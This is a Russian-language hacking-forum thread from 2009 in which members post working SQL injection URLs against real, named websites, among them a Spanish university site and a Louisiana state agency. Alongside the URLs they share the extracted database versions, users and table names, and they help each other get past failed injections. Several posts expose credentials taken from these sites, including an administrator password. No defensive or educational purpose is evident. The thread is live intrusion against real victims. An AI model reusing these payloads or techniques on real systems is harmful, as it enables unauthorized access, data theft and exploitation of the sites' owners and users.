HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.05.2009, 16:04
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+TABLE_NAME,2+from+information_sche ma.tables+limit+197,1000--

tables:
jos_users
user
virtual_users
virtual_domains
view_users
users
series_users
series
seminarios
turba_shares_users
nag_shares_users
mnemo_shares_users
ingo_shares_users
horde_users
wp_users
usuarios
Таблицы все закрыты((

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+concat_ws(0x3a3a,user,password),2+ from+mysql.user--
 
Ответить с цитированием

  #2  
Старый 17.05.2009, 16:07
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199

Репутация: 258
По умолчанию

Цитата:
http://audiovisuals.audio.uv.es/tau/producciones.php?action=prod&id=-9999+union+select+1,2,concat_ws(0x20,version(),
user(),database()),4,5,6,7,8,9,10,11,12
version 4.0.17-nt
user root@localhost
database tau
 
Ответить с цитированием

  #3  
Старый 17.05.2009, 16:12
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Цитата:
http://www.romver.ru/services/services.php?razdel=-1117+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_ws(0x 0b,user(),dat abase(),version()),11,12
caramel@10.210.10.10
caramel
5.0.75-log

В таблицах ниче интересного, админки нет
 
Ответить с цитированием

  #4  
Старый 17.05.2009, 17:53
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

ПР5
http://www.fraudadvisorypanel.org/newsite/publications.php?c_id=-1+union+select+1,2,username,password,id,6,7,8,9,10 ,11,12,13+from+members/*

davido1 leaden
Админку не нашёл(
 
Ответить с цитированием

  #5  
Старый 17.05.2009, 17:54
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+23,1/*
через column_name узнал, что в этой таблице есть id,login,password
дальше копать не могу, не позволяют знания пока...

попробовал: http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,login,4,5,6,7,8,9,10,11+from+ad min/*
не работает...

p.s. ТИЦ 40
Если кто докопает что-интересного, напишите в лс, хотя бы понять что не правильно делал.
 
Ответить с цитированием

  #6  
Старый 17.05.2009, 18:10
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.ma-consult.ru/public2.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--

4.0.27-log:fgtkmcby@localhost:fgtkmcby
 
Ответить с цитированием

  #7  
Старый 17.05.2009, 18:11
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

AlexSatter ня
Цитата:
http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,concat_ws(0x3a,id,login,passwor d),4,5,6,7,8,9,10,11+from+birja_hosting_miheeff_ru .admin/*
ошибка твоя заключалась в том что таблицы admin небыло в бд под которой сайт работает.
 
Ответить с цитированием

  #8  
Старый 17.05.2009, 18:12
peton
Новичок
Регистрация: 12.12.2008
Сообщений: 1
Провел на форуме:
1755

Репутация: 4
По умолчанию

http://www.izone.ru/soft_admin/go.php?action=home&id=3075-1+union+select+concat(version(),char(58),database( ),char(58),user())
Дальше непрёт, хз какие там таблицы, в information_schema не роет. Есль кто подберёт, мне напишите, ок
зы: в адресную строку смотрите ))
 
Ответить с цитированием

  #9  
Старый 17.05.2009, 18:25
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435

Репутация: 90
По умолчанию

----------------
http://www.lhfa.louisiana.gov/news/news_detail.php?ID=-100'+union+select+1,2,3,4,5,6,7,8,9/*
----------------------------------
Database Version: 5.0.45
Database name: lhfa2
User name: lhfa@localhost
------------------------------------

/admin/


|----------------------------------|
admin : Lhfa$543
|----------------------------------|
 
Ответить с цитированием

  #10  
Старый 17.05.2009, 18:31
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR: 4

http://www.migrationhistory.com/ma/index.php?section=members&id=1+union+select+1,conc at_ws(0x3a,version(),user(),database())--

4.0.18:migrationhistory@srv102.webdeal.no:migratio nhistory
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.